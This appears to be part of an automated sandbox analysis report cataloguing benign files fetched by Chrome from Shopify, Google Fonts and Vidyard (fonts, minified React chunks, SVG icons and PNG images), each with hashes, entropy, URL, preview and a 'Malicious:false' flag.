                                                                    SHA-512:991350710E24D38D4717C672BE80B6E70A0CCA9507C68137F4A68E4D112CACFCAC878EB133E813776A7D17A5C80E324FCB094AE59E75303BF9B213A706661EAD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/static/fonts/ShopifySans--bold.woff2
                                                                    Preview:wOF2...............$...L..........................."....`..`..0.v..s.....4..:.....6.$..0. ..g..U...[...O..1...6....Rwj.V.x..*...9.H:^W.m*.z.$.............$......m....XZUANbt."r.J.H....b.7.Td.^.a...y.u....B"....JT....."ET...."...7.+.....".&.B..id.s......yw..1...P..y..^T&..?E....|b..[Z.._q...1\...........d\[...^Pbs..Bz..,.y.=?;.29.d.....&{9.D~xmg...yG...G..[.;.....3..{s..0..l........X._.....n.....1E.R..+.0....N6TG2.x..I.?...7;.._.".D..*`m.....@.j."..J...W.ca...F.VO....0....o.5.........i?q...>..]...=..........u`"..,.v\../Q._....>.F!+...*q.2..".x@...M.....%... ..$.B...pS....aQ.......9b.8p._3F.8.F.H.....F....TYt...h.....o..y?..ET....$..0..0..B.|..o..e...$$D.L.&........T.hw..*.9.M^......~m.!%.up..H.ww\5..GD.........6.N...uN....._.r.s..B)g.q..J...n.6.......nC....h.a......v..|'..)[..<.f..{.-..{...>^.}.q."!....&&.V1Q.2..,.(.tI?.S.;3...F..X`.,[.d.U...u1}.....6..y.yK..a....6K....K..a...OM^..H+4.+P..[al.....^L.q.*`....F.....oG............d.4YU.U.OT.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):48236
                                                                    Entropy (8bit):7.994912604882335
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:015C126A3520C9A8F6A27979D0266E96
                                                                    SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                    SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                    SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                    Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1230)
                                                                    Category:downloaded
                                                                    Size (bytes):1231
                                                                    Entropy (8bit):5.3443950686715125
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CD8F41324DD3E3E37FDA3FF2476D2129
                                                                    SHA1:25FCB066CBDAE4DB58F6BE041655ED7811707283
                                                                    SHA-256:1BA8CE933ECD2C985F84ED3B411658B931C5CCCC86451813AED59878C1312C50
                                                                    SHA-512:D1B27A9252FEBA3C0BA8AED6FC39C2144008FB868736205B994A851E0F0F22B5823F9BA62E61A2F20A3560D3A29BD74C39518B1916A1BE7CD076A1C4861CEF12
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-SWIYBLVM.js
                                                                    Preview:import{a as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XBULFQFZ.js";import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-IK3X57EU.js";import{a as L}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as H}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var m=e(L()),c=e(H());var o=e(a()),s=(0,c.forwardRef)(({sectionName:d,sectionIndex:l,componentName:f,component:n,className:p,children:u,id:b,style:y,errorBoundaryFullWidth:N=!1,navbarPadding:S=!1,...g},T)=>{let A=Object.fromEntries(Object.entries(g).filter(([E])=>Boolean(E.match(/^(aria|role|data-)/g)))),r=t(d||n||""),B=t(f||n||"")||r;return(0,o.jsx)(i,{fullWidth:N,
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):10880
                                                                    Entropy (8bit):3.9407507138496927
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:45F080D8CA27225884BA1714123870C3
                                                                    SHA1:238A6044387C61D9D3BEA4ED0814FCB9E055E921
                                                                    SHA-256:C1C69DF92A063A2B71FA5207516E66102A7E2979B7EFD10E14E76ADBEB4EC808
                                                                    SHA-512:E6D4967FA376D09473C912B47BB5A7B9F9D572373EFE2506623D9FA7564EDEB8FD9C011799B6B1D103CFDD606628C7F776F74C891199563A822FF105C31E9D5E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="111" height="65" viewBox="0 0 111 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="109" height="63" rx="7.79" fill="white"/>.<path d="M38.9074 40.4894C38.8925 40.5093 38.8776 40.5291 38.8627 40.549C37.171 40.549 35.4794 40.549 33.7133 40.549C33.7976 40.4498 33.8324 40.3753 33.8919 40.3406C34.6112 39.914 34.9287 39.2988 34.9238 38.4505C34.9138 36.4364 34.9486 34.4173 34.9635 32.4032C34.9684 31.8625 34.9138 31.3317 34.6708 30.8356C34.3433 30.1708 33.6935 29.8781 32.994 30.1113C32.23 30.3643 31.7686 30.9497 31.4164 31.6392C31.3867 31.6988 31.3966 31.7831 31.3966 31.8575C31.3966 34.0998 31.3916 36.3372 31.3966 38.5795C31.3966 39.3336 31.7538 39.8991 32.3788 40.3109C32.4582 40.3605 32.5227 40.4299 32.5922 40.4894C32.5773 40.5093 32.5673 40.5341 32.5525 40.5539C30.8608 40.5539 29.1741 40.5539 27.408 40.5539C27.4924 40.4597 27.5321 40.3902 27.5916 40.3505C28.2911 39.914 28.6185 39.2839 28.6185 38.4654C28.6135 34.2189 28.6185 29.9674 28.6185 25.7209C28.6
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):2377
                                                                    Entropy (8bit):4.835893452341834
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7513D2889DE95EF0E01A95D970C4EC41
                                                                    SHA1:02ACA8CA579642901A294FBDE36020E1BBAC4DBE
                                                                    SHA-256:5D421EBC546630DFDD23B01EC4AE5A90328332870D493EB3E5DE1753B0DF424D
                                                                    SHA-512:748A3CC54A5EFCC0C0F6759EE6999AFACB23361D89B43F54D955C68CB1E32C54EF42C33FC23825624EA10F01FDB6C7C82888D767F28E009384DFDC55F43151CE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="153" height="63" viewBox="0 0 153 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="152" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1397_6425)"/>.<g clip-path="url(#clip0_1397_6425)">.<path d="M108.946 28.9629V41.8281H104.652V22.8284C106.368 22.8284 108.119 22.7951 109.864 22.8637C110.132 22.8637 110.423 23.329 110.635 23.6282C113.284 27.3882 115.926 31.1531 118.56 34.9229C118.693 35.1098 118.84 35.2885 119.139 35.679V22.8886H123.521V41.88C121.859 41.88 120.251 41.9132 118.639 41.8509C118.354 41.8385 118.016 41.477 117.818 41.1966C115.004 37.2163 112.202 33.2277 109.411 29.2308C109.334 29.1207 109.243 29.0231 109.158 28.9172L108.946 28.9629Z" fill="black"/>.<path d="M52.7696 32.3284C52.7925 26.7756 57.1903 22.3362 62.606 22.4131C65.2125 22.4601 67.6951 23.5338 69.5144 25.4009C71.3337 27.268 72.3426 29.7777 72.3219 32.3845C72.2845 37.9 67.8597 42.3372 62.4419 42.2936C57.0241 42.25 52.7447 37.8293 52.7696 32.3284ZM62.4689 2
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 362 x 414, 8-bit colormap, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):54975
                                                                    Entropy (8bit):7.978331125930732
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:38E8E2468455274FD256F4A88AECF8E4
                                                                    SHA1:EC014612A2DC61F047B8F4EB094D41EA5275A3B4
                                                                    SHA-256:5FD99F833331738CC996B8948A85255C7631AEB52D24CF3EE33A928D75DDDEFA
                                                                    SHA-512:1F57EDAEAF361936E7688B495D855000575530AC45676D556ADC7DF0FAC3561A16DD94EC25AD0B0B8CFEFFD25488693A30429A00586024C053ACD01F384C2767
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.PNG........IHDR...j................$eXIfII*.......<...............imagery4..'=......PLTE.........(((............GpL....................................................................................4>C2;@...7@E!+1...:CG................../8=%-2....#)...'05-5:=FJ*37@HL............DKN..........)/......LQS. (GNQ^aaWZ[SWY........... .&,..%:%..........Y^_........./......."^^].... #......!(-.........5 ....OTV.....................bdd.........1% ....@%..%*...'5=F(.?,$..%............M90jC5...}XHUdkE1)......,:A............xP@pI:.....+...L,".')O_f............._N....!1b>1..........&..GXaS0%[in...$.....lmkfhh./8}.....X5).."UB9......`nt.....~.k\.rcesy?Q\...xxw`6*8,&.......s......ygrsq.fZ.....vuUI.xnEDC...kx~%..7IUnPD....!$~...2A.pgSNLaH?....9I.&<1+(...y]S.~g.cP...543..5-AM...:...mX..que^j:-J..?<:dVQ1PhY'. AY.WD...xB3......Gav..|..~.........-.*.%.(h..y....tRNS. ...__............................................................................................................................
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (57440)
                                                                    Category:downloaded
                                                                    Size (bytes):261912
                                                                    Entropy (8bit):5.309869753471018
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8310C18AE8A2FCF58A6950E521584BFB
                                                                    SHA1:537CE0C25D1171462F5CDD6656748FE3AB9C30ED
                                                                    SHA-256:FB7EF21E8B62876F72C3417AA3DFE66F842B393DBEED4559C6AD33F56F126E37
                                                                    SHA-512:D3420AB888277C18F98C8C36850A3E69F65F4BFDB5EF7A38A40F410CF0A77B3C4E330BC7BE3BF6F6CE1ED6973D37B09522B6A30176AE4DECDC6913EE33EBF27F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/vendors~player-pomo-701ee626bc6396c34baa5fbf11fe3f98.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[31],{1047:./*!*********************************************************!*\. !*** ../node_modules/react/cjs/react.production.min.js ***!. \*********************************************************/./*! no static exports found */./*! all exports used */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(e,t,n){"use strict";./** @license React v16.12.0. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var s=n(/*! object-assign */434),r="function"==typeof Symbol&&Symbol.for,f=r?Symbol.for("react.element"):60103,c=r?Symbol.for("react.portal"):60106,o=r?Symbol.for("react.fragment"):60107,i=r?Symbol.for("react.strict_mode"):60108,a=r?Symbol.for("react.profiler"):60114,u=r?Symbol.for("react.provider"):60109,l=r?Symbol.for("react.context"):60110,d=r?Sy
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (3157)
                                                                    Category:downloaded
                                                                    Size (bytes):3158
                                                                    Entropy (8bit):5.323393702066461
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:859A331FF3C0B0AD0B6E2CA50A84C0AB
                                                                    SHA1:F88B29EAB0FDC5D7567305BFE718788CDF744C5A
                                                                    SHA-256:3D0169348DACEEB3F1A30ABDAE9C6D5E5F61DC82501F973809263AEFDF989F0A
                                                                    SHA-512:B3B57CA7475CC40D4280B5B32D77DC56CF835A06C8374E0210A4ECCDB7CAFA8E41BBA925E3A055530911EA7A312A977B0EF1C3DD639D37EB5A1E7CF8826406B7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XBULFQFZ.js
                                                                    Preview:import{d as B}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js";import{b as v}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RCEKJ4KJ.js";import{ba as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a as w}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as E}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var b=u(w()),h=u(y());var a=u(y()),N=(0,a.createContext)(null),p={didCatch:!1,error:null},f=class extends a.Component{constructor(r){super(r),this.resetErrorBoundary=this.resetErrorBoundary.bind(this),this.state=p}static getDerivedStateFromError(r){r
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (865)
                                                                    Category:downloaded
                                                                    Size (bytes):1217
                                                                    Entropy (8bit):5.4233257132461175
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3C8446BE8E208D720A209689A14AA6C7
                                                                    SHA1:4E07AE4B4EC5845832E128CD0C8EBD34E2A1AB9D
                                                                    SHA-256:ECD94717B629A31EDAC87DF983AFBC6CD3DF2654892FA1F96B98F13C1A8EE0F1
                                                                    SHA-512:E4E668A38567FC90BFB455BF3B96C6610DC8A0892F1CB1082CD519BE1555066716559647D089541D4CF10A38F924BCD63DFEECDC70423FF4E95C03B2D7F43CA8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js
                                                                    Preview:import{a as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{c as _}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var l=_(s=>{"use strict";var y=c(),d=Symbol.for("react.element"),m=Symbol.for("react.fragment"),O=Object.prototype.hasOwnProperty,v=y.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,E={key:!0,ref:!0,__self:!0,__source:!0};function i(t,e,f){var r,o={},n=null,u=null;f!==void 0&&(n=""+f),e.key!==void 0&&(n=""+e.key),e.ref!==void 0&&(u=e.ref);for(r in e)O.call(e,r)&&!E.hasOwnProperty(r)&&(o[r]=e[r]);if(t&&t.defaultProps)for(r in e=t.defaultProps,e)o[r]===void 0&&(o[r]=e[r]);return{$$typeof:d,type:t,key:n,ref:u,props:o,_owner:v.current}}s.Fragment=m;s.jsx=i;s.jsxs=i});var j=_((x,p)=>{"use strict";p.exports=l()});export{j as a};./*! Bundled license information:..react/cjs/react-jsx-runtime.production.min.js:. (**. * @license React. * react-jsx-runtime.prod
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):1601
                                                                    Entropy (8bit):4.339389522117405
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9981B54DC95377F5D47DE079545AEDC3
                                                                    SHA1:106C5B2F0F51174F97B06A8FA3B82A05B9E3E8DA
                                                                    SHA-256:EA665CC8EF4B2379465495BA43CD5CDBBA88CD70DD51C6FA59AEC331FD2336BE
                                                                    SHA-512:030EF87FB521670FB5E3BEC9434371C15300365ECF467870AAA34BE33921320CE663347EBD6F0F5A07C93192908D739641078CB3EBB60DC2CCF33C3CE58CB71D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure/assets/home/redesign2022/icons/infinity-ea665cc8ef4b2379465495ba43cd5cdbba88cd70dd51c6fa59aec331fd2336be.svg
                                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="24" cy="24" r="24" fill="#FEF4F6"/>.<circle cx="24" cy="24" r="17" fill="#FFE9F1"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M20.7464 21.4606C20.7183 21.4315 20.6897 21.4029 20.6607 21.3749C19.3071 20.0686 17.1508 20.107 15.8445 21.4606L15.7763 21.5313C14.4089 22.9482 14.4089 25.1933 15.7763 26.6102C15.8035 26.6384 15.8313 26.6662 15.8596 26.6935C17.1755 27.9634 19.2717 27.9261 20.5416 26.6102L23.1288 23.9293L20.7464 21.4606ZM27.4584 26.6102C28.7283 27.9261 30.8245 27.9634 32.1405 26.6935C32.1687 26.6662 32.1965 26.6384 32.2237 26.6102C33.5911 25.1933 33.5911 22.9482 32.2237 21.5313L32.1555 21.4606C30.8492 20.107 28.6929 20.0686 27.3393 21.3749C27.3103 21.4029 27.2817 21.4315 27.2536 21.4606L24.8713 23.9293L27.4584 26.6102ZM24 22.852L24.9214 21.8972H24.9894L24.9555 21.862L26.2642 20.5058C26.3036 20.4649 26.3437 20.4249 26.3845 20.3854C28.2846 18.5518 31.3113 18.6057 33.14
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (887)
                                                                    Category:downloaded
                                                                    Size (bytes):888
                                                                    Entropy (8bit):5.08596381343484
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:27B8A5E974C1EEC87B32F8636C286105
                                                                    SHA1:307B28370DFE23B9BFEFBC0579903C4737B2765A
                                                                    SHA-256:8BC4E816AFA5F963732856E512D80D35553C412CA76C16A26ED733AC41633532
                                                                    SHA-512:AE379B08D1202AF8F9127B434C8CB021C6062A21C96CDBACC7F355713F330F12A3FED149E5610DC0268D0C2806C035E55D26504885F1ADBFE8A905E8CBF0DFC2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LS3F5NL2.js
                                                                    Preview:import{b as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";var o=e("rounded-2xl ring-0",{variants:{horizontal:{true:"",false:""},mode:{light:"ring-black/20 border-black",dark:"ring-white/20 border-white"},size:{large:"p-xl",small:"p-lg"},type:{default:"p-0",horizontal:"flex flex-col sm:flex-row gap-x-lg",outline:"ring-1",shadow:"",topDivider:"p-0 pt-md border-t-2 rounded-none"}},compoundVariants:[{mode:"light",type:"shadow",className:"shadow-light"},{mode:"dark",type:"shadow",className:"shadow-dark"},{horizontal:!0,type:"default",className:"flex flex-col sm:flex-row gap-x-lg gap-y-4 sm:gap-y-0"}]}),t=e("leading-[0]",{variants:{headingGroup:{true:"mt-md",false:""}}}),r=e("",{variants:{horizontal:{true:"w-16 max-w-none",false:"mb-md"}}}),l=e("w-11 h-11",{variants:{horizontal:{false:"mb-md"}}});export{o as a,t as b,r as c,l as d};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (878)
                                                                    Category:downloaded
                                                                    Size (bytes):879
                                                                    Entropy (8bit):5.323160126592187
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9BE0FD976EA2C48B8609D433E0FC34CB
                                                                    SHA1:3722A1A081A44E9CAF323295E6ACBAE6B0671588
                                                                    SHA-256:C8215E7E3794FB848070DA20042BC64A50B707C158B27C65602BAAEFE8D6ACAF
                                                                    SHA-512:288053A49B56EFD5E2B1B8711797600C55D7BE1CFC2BF4D84B40958D4FEED43AA54908CC5BB8E12D58F2CEAE2E6140403944CDEAFBD0777134E5DB2A40D13E86
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-53AECWNY.js
                                                                    Preview:import{b as H}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var p=l(r());var t=e=>function({children:a,...n}){return p.default.createElement(e,{...n,className:H(n.className,"richtext"),dangerouslySetInnerHTML:{__html:a}})},m=e=>function({children:a,...n}){let s=e({children:a,...n});return t(s)({children:a,...n})};var L=t("h1"),M=t("h2"),d=t("h3"),R=t("h4"),E=t("h5"),h=t("h6"),u=t("p"),C=t("span"),x=t("div"),F=t("a"),g=t("li"),A=t("small"),y=t("q"),b=t("dt"),S=t("dd"),f=m(({children:e})=>e.indexOf("</q>")>=0?"span":"q");export{L as a,M as b,d as c,R as d,u as e,C as f,x as g,g as h,A as i,b as j,S as k,f as l};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1717)
                                                                    Category:downloaded
                                                                    Size (bytes):1718
                                                                    Entropy (8bit):5.1821172396737465
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:945800A855E1C1AE67CC86817C017DAA
                                                                    SHA1:FE5F873F3F06D129DEFD2FCC2DB93B8D854B34F2
                                                                    SHA-256:A1B56FCEB03B6A4BF057C8F0DBDEC63C4CB3CDF2AD75C25E78B8AB500CA68C39
                                                                    SHA-512:D0D50FC897F09EBF13EF45703354D2EDC7C46199C01992FE1C03FF946B43F7A5150ABA9C79700715082B51F9469D5F76840F3B1E8A149C0C27D8102FA9903107
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZCVWS253.js
                                                                    Preview:import{b as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RCEKJ4KJ.js";import{b as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";import{b as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=n(o()),g=a("group font-bold focus:outline-state-focus outline-2 outline-offset-2 transition-colors duration-150 ease-in-out",{variants:{mode:{light:"text-link-light focus:text-link-light-focus hover:text-link-light-hover active:text-link-light-active disabled:text-link-light-disabled",dark:"text-link-dark focus:text-link-dark-focus hover:text-link-dark-hover active:text-link-dark-active disabled:text-link-dark-disabled"},size:{small:"text-base tracking-ff
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (652)
                                                                    Category:downloaded
                                                                    Size (bytes):653
                                                                    Entropy (8bit):5.194595561982419
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:1392374BA88BF07252F8D9C947EACFA7
                                                                    SHA1:7B5B5D741160A9A8944D84FC4CDD67E25C24A4E3
                                                                    SHA-256:3C7C305B462F7476BDA70FD00CCEA17ECBB2EE9DA2FD37E0E13A2F15B6D19066
                                                                    SHA-512:0146F137F3A872C6FBDA0FFBAB41EBE565E7082E6D2B956755F3D2C3D0334E0A374173F4A749CFE3FA1955D5CB7F3DE6BAA88CCB4ABF7416B33EC15B440467EA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TZCLUSIF.js
                                                                    Preview:import{b as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3HQUNPWN.js";import{a as t,b as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5LSG7SHH.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var e=n(r());function d(o){let c={center:o.center,span:{xs:4,sm:8,md:10,lg:8,xl:8}};return(0,e.jsx)(p,{"data-component-name":"section-header",children:(0,e.jsx)(t,{...c,children:(0,e.jsx)(a,{...o})})})}export{d as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (510)
                                                                    Category:downloaded
                                                                    Size (bytes):511
                                                                    Entropy (8bit):5.1513004114515795
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CE0D6AAC947B63E3D412E593B3DC9512
                                                                    SHA1:10E7D719CD5D588F5355EFCA5BD2D8E9763D952F
                                                                    SHA-256:C066CBAE6E0282B8F843383C099AEC9D3A0CF4203601FBE0BC8E43D68D976AC4
                                                                    SHA-512:EFD0582DF8F40572092A6FBB75949F356060829880BB1ADEBF7B2F7FE480A649C02D097C3B677CA17A50982ECB602EFB34E42C4827CB204CC5758D1855D95236
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NTXJAFG3.js
                                                                    Preview:import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var n=i(o()),c=s=>{let[r,a]=(0,n.useState)(null);return(0,n.useEffect)(()=>{let e=window.matchMedia(s),t=()=>a(e.matches);return t(),e.addListener?e.addListener(t):e.addEventListener("change",t),()=>{e.removeListener?e.removeListener(t):e.removeEventListener("change",t)}},[s]),r};export{c as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 636 x 635, 8-bit colormap, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):88842
                                                                    Entropy (8bit):7.989035202387038
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4ECC74EFA9FC9E5BC3EBAA72AFD85401
                                                                    SHA1:B39F28ED7C3AE50A09FD2F6C88884E695D94A885
                                                                    SHA-256:C847E2B4AEFFC2E03966F0470516FF7165A894031450367C07B80DDED6759306
                                                                    SHA-512:5D2A9F75AD694BBBA5AFD474179DC98954555FA2943828C7DE98C5C2579313DBEEC55B2644C4226DFC460458656BF511C6D75A1DEDF999989258EA8DC840768E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.PNG........IHDR...|...{.....N6......iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....PLTEGpL......l...............................................................................................................Ib.................................................{........y...........z.....x..|.....z..~.....}.....}....................x...........q.................y..z........{..v.....~.....}.....{.......u..{..w..v..|.....}.....{...........{.....~..o..r..n..............x..t........|........~.....r..o..............q.....}..w..p..v..r.....n...........{..r.....o..r..o..}..u..m.....s..x....x...............|.............|..................m..t......t....o.............................................p....w........z..y....z................
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1993)
                                                                    Category:downloaded
                                                                    Size (bytes):1994
                                                                    Entropy (8bit):5.32371352209425
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:371895798C498F32400B5D9C3703667F
                                                                    SHA1:75084AE44918CF4A7B983B7763B32293ADC60D90
                                                                    SHA-256:7BF22C8C8C555F4E3FBECA6EBC8851DE9C32377EE5DB9DB18D41E792F96079AE
